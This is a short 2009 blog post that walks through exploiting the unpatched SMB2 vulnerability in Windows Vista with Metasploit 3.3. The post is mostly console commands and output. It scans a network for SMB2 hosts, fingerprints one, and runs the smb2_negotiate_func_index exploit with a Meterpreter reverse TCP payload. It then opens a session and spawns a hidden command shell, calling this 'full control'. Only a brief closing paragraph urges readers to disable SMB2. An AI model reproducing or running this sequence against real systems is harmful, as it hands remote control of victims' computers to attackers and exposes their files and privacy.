Tuesday, October 6, 2009

Testing the new smb2 exploit

Recently I’ve downloaded the metasploit framework 3.3 and tested the new unpatched smb2 exploit in my local network ;-D.

Run the metasploit framework console
[email protected] $ ./msfconsole

Scan the network that has smb2 enabled
msf > use auxiliary/scanner/smb/
msf auxiliary(smb2) > set RHOSTS
msf auxiliary(smb2) > set THREADS 100
THREADS => 100
msf auxiliary(smb2) > run

[*] supports SMB 2 [dialect 2.2] and has been online for 21 hours
[*] supports SMB 2 [dialect 2.2] and has been online for 43 hours
[*] supports SMB 2 [dialect 2.2] and has been online for 30 hours
[*] supports SMB 2 [dialect 2.2] and has been online for 80 hours
[*] supports SMB 2 [dialect 255.2] and has been online for 10 hours
[*] supports SMB 2 [dialect 255.2] and has been online for 8 hours

Quite a result!. Now check for the Windows version from the selected IP
msf exploit(smb2_negotiate_func_index) > use auxiliary/scanner/smb/version
msf auxiliary(version) > set RHOSTS
msf auxiliary(version) > run

[*] is running Windows Vista Ultimate Service Pack 1 (language: Unknown)
[*] Auxiliary module execution completed

It is Windows Vista. Now we’ll run the exploit to that IP
msf auxiliary(version) > use exploit/windows/smb/smb2_negotiate_func_index
msf exploit(smb2_negotiate_func_index) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(smb2_negotiate_func_index) > set LHOST
msf exploit(smb2_negotiate_func_index) > set LPORT 5678
LPORT => 5678
msf exploit(smb2_negotiate_func_index) > set RHOST
msf exploit(smb2_negotiate_func_index) > exploit

[*] Connecting to the target (…
[*] Started reverse handler
[*] Sending the exploit packet (854 bytes)…
[*] Waiting up to 180 seconds for exploit to trigger…
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened ( ->

Succeeded! Now I’ve got access to the computer. That’ll give me a full control to the computer
meterpreter > sysinfo
Computer: GREEN
OS : Windows Vista (Build 6001, Service Pack 1).
Arch : x86
Language: ms_MY
meterpreter > execute -f cmd.exe -c -H -i

Process 636896 created.
Channel 2 created.
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.


It is quite a dangerous situation where people are able to get into your computer without you knowing about it. And to get worst, they can get your personal files/folder or spy on you.

If you’re connected to a public wired/wireless network (Starbucks, Old town, or Lab), the recommended solution for the time being is to disable your SMB2. You can get the Microsoft’s released of disabling SMB2 here.

Be not an ignorant or you’ll be in trouble.

No comments:

Post a Comment